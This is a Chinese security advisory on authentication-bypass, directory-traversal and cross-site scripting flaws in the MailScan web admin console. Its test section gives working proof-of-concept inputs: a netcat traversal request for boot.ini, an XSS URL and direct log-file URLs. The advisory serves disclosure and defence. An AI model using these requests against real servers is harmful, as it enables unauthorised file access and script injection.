安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
MailScan Web管理接口多个安全漏洞
发布日期:
2008-08-15
更新日期:
2008-08-20
受影响系统:
MicroWorld MailScan for Mail Servers 5.6.a espatch1
描述:
BUGTRAQ ID:
30700
CVE(CAN) ID:
CVE-2008-3726
,
CVE-2008-3727
,
CVE-2008-3728
,
CVE-2008-3729
MailScan是先进的邮件服务器实时杀毒和反垃圾邮件解决方案。
MailScan提供了基于Web的管理功能,管理控制台(Server.exe)是以LocalSystem权限运行在TCP 10443端口上的HTTP服务。该服务存在多个输入验证错误,允许恶意攻击者泄露敏感信息、执行跨站脚本或绕过某些安全限制。
1) 远程攻击者可以向Web管理接口发送特制请求执行目录遍历攻击,下载任意文件。
2) Web管理接口没有正确地限制对某些页面的访问,攻击者可以绕过认证直接访问受保护的页面。
3) 在出现错误的情况下,没有正确地过滤对Web管理接口的URL输入便返回给了用户,这可能在用户浏览器会话中执行任意HTML和脚本代码。成功攻击要求用户的浏览器没有URL编码请求,如Internet Explorer。
<*来源:Oliver Karow (
Oliver.karow@gmx.de
)
链接:
http://secunia.com/advisories/31534/
http://marc.info/?l=bugtraq&m=121881329424635&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
echo -e "GET /../../../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>
http://ip:10443/<script>alert("No_Problem_its_just_an_admin_interface")</script>
http://ip:10443/LOG/W072808.LOG
http://ip:10443/LOG/Weblog.LOG
http://www.milw0rm.com/exploits/6407
建议:
厂商补丁:
MicroWorld
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mwti.net/index.asp
浏览次数:
2700
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客